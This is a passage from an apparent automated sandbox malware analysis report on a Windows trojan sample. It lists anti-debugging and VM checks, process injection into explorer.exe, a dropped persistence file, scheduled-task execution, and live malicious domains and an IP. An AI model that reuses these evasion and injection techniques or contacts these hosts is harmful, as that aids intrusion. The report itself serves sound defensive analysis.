                Source: explorer.exe, 00000002.00000000.312903359.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                Source: explorer.exe, 00000002.00000000.266848734.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                Source: explorer.exe, 00000002.00000000.312903359.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00408A87 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408A87
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00417194 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00417194
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_021B0042 push dword ptr fs:[00000030h]0_2_021B0042
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 12_2_021A0042 push dword ptr fs:[00000030h]12_2_021A0042
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00407933 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00407933
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00408A87 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408A87
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0040A40B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040A40B
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00410E4E SetUnhandledExceptionFilter,0_2_00410E4E
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00408F5F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00408F5F

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: utisvaa.2.drJump to dropped file
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeMemory written: C:\Users\user\Desktop\P2SMn3jloH.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaMemory written: C:\Users\user\AppData\Roaming\utisvaa base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_021B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_021B0110
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeThread created: C:\Windows\explorer.exe EIP: 57B1930Jump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaThread created: unknown EIP: 5851930Jump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeProcess created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaProcess created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaaJump to behavior
                Source: explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.303168822.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.265409063.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                Source: explorer.exe, 00000002.00000000.348886201.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.270117022.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.303168822.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.265409063.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.265126182.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.302408124.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.333974747.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                Source: explorer.exe, 00000002.00000000.335292872.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.303168822.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.265409063.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_0041325D
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_00418265
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_00418231
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_00412B6A
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00413374
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: GetLocaleInfoA,0_2_00411B01
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_00409B37
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_004183A4
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_0041340C
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_004124FC
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00413480
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_00418541
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_00412DC2
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00413652
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: GetLocaleInfoA,0_2_00418691
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0041377A
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00413713
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_00411FE0
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_004137B6
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00411388 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00411388
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00405224 CallNamedPipeA,GetThreadPriority,SearchPathA,OpenEventA,FindResourceW,GetVersionExA,SetWaitableTimer,CopyFileW,WriteConsoleInputA,SizeofResource,GlobalDeleteAtom,lstrlenW,GetModuleHandleA,GetWindowsDirectoryA,MapViewOfFileEx,GlobalGetAtomNameA,DebugBreak,LocalUnlock,VerifyVersionInfoW,0_2_00405224

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.P2SMn3jloH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.utisvaa.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.utisvaa.21a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.P2SMn3jloH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.utisvaa.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.utisvaa.21a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                512
                Process Injection
                11
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts3
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                12
                Virtualization/Sandbox Evasion
                LSASS Memory421
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                Non-Application Layer Protocol
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)512
                Process Injection
                Security Account Manager12
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Deobfuscate/Decode Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information
                Cached Domain Credentials16
                System Information Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Software Packing
                DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                File Deletion
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 736951 Sample: P2SMn3jloH.exe Startdate: 03/11/2022 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus detection for URL or domain 2->34 36 5 other signatures 2->36 7 P2SMn3jloH.exe 2->7         started        10 utisvaa 2->10         started        process3 signatures4 46 Contains functionality to inject code into remote processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 P2SMn3jloH.exe 7->12         started        50 Multi AV Scanner detection for dropped file 10->50 52 Machine Learning detection for dropped file 10->52 15 utisvaa 10->15         started        process5 signatures6 54 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->54 56 Maps a DLL or memory area into another process 12->56 58 Checks if the current machine is a virtual machine (disk enumeration) 12->58 17 explorer.exe 2 12->17 injected 60 Creates a thread in another existing process (thread injection) 15->60 process7 dnsIp8 26 host-file-host6.com 87.251.79.60, 49699, 80 RISS-ASRU Russian Federation 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\utisvaa, PE32 17->22 dropped 24 C:\Users\user\...\utisvaa:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                P2SMn3jloH.exe46%ReversingLabsWin32.Trojan.Generic
                P2SMn3jloH.exe35%VirustotalBrowse
                P2SMn3jloH.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\utisvaa100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\utisvaa46%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Roaming\utisvaa35%VirustotalBrowse
                SourceDetectionScannerLabelLinkDownload
                13.0.utisvaa.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.2.P2SMn3jloH.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.0.utisvaa.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.0.utisvaa.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.0.utisvaa.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                12.2.utisvaa.21a15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.0.utisvaa.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                1.0.P2SMn3jloH.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.P2SMn3jloH.exe.21b15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.0.utisvaa.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                1.0.P2SMn3jloH.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.P2SMn3jloH.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.2.utisvaa.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                13.0.utisvaa.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                SourceDetectionScannerLabelLink
                host-file-host6.com18%VirustotalBrowse
                host-host-file8.com17%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://host-file-host6.com/0%URL Reputationsafe
                http://host-host-file8.com/100%URL Reputationmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                host-file-host6.com
                87.251.79.60
                truetrueunknown
                host-host-file8.com
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://host-file-host6.com/true
                • URL Reputation: safe
                unknown
                http://host-host-file8.com/true
                • URL Reputation: malware
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                87.251.79.60
                host-file-host6.comRussian Federation
                20803RISS-ASRUtrue
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:736951
                Start date and time:2022-11-03 12:24:08 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 44s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:P2SMn3jloH.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@6/2@4/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 93.8% (good quality ratio 87.2%)
                • Quality average: 75.4%
                • Quality standard deviation: 30.8%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 25
                • Number of non-executed functions: 33
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                TimeTypeDescription
                12:26:08Task SchedulerRun new task: Firefox Default Browser Agent 18B1406226926BB9 path: C:\Users\user\AppData\Roaming\utisvaa
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                87.251.79.60file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                fdnKz7IyHm.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                vVmIgdcmAL.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                file.exeGet hashmaliciousBrowse
                • host-file-host6.com/
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                host-file-host6.comfile.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                fdnKz7IyHm.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                vVmIgdcmAL.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                JB3fup8PrI.exeGet hashmaliciousBrowse
                • 87.251.79.93
                1ClHTuhdHI.exeGet hashmaliciousBrowse
                • 87.251.79.68
                ar9EPOB64B.exeGet hashmaliciousBrowse
                • 87.251.79.68
                file.exeGet hashmaliciousBrowse
                • 87.251.79.68
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                RISS-ASRUfile.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                hY48FAymog.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.105
                file.exeGet hashmaliciousBrowse
                • 87.251.79.60
                No context
                No context
                Process:C:\Windows\explorer.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):215552
                Entropy (8bit):6.969285988131741
                Encrypted:false
                SSDEEP:3072:zmRA4EwqbftQPtRLlTsLxmE6pf5ADM8VGQqf/r4nnFxtHglCFBQx:zmyHbFeRRILgEFI8sfTuxtHMOq
                MD5:0779F7B34E9079944427B8260B49C205
                SHA1:31F2CF1DC970FDFAF51B9AAB2C9E0B9715FB53EC
                SHA-256:5C7FF5F2993BDB60D15A567DFAEF41DCD30875D6629F2775ACDB190E01DCEF87
                SHA-512:E22E6186F82A3EB329874C246A9D64CC45EDE3A6EE93447DCDC3E93CB0C52A40B9CFB36E0350E1CDC1487D47BB94D3478B49376C2DE5C64A82DA545C2C976B3E
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 46%
                • Antivirus: Virustotal, Detection: 35%, Browse
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.^.".^.".^.".@...C.".@.....".y.Y.Y.".^.#...".@...l.".@..._.".@..._.".Rich^.".........PE..L...#H.a..................... ....................@..................................D..........................................P........C..........................................................HC..@............... ............................text...J........................... ..`.data..............................@....rsrc....C.......D..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\explorer.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Reputation:high, very likely benign file
                Preview:[ZoneTransfer]....ZoneId=0
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.969285988131741
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.83%
                • Windows Screen Saver (13104/52) 0.13%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
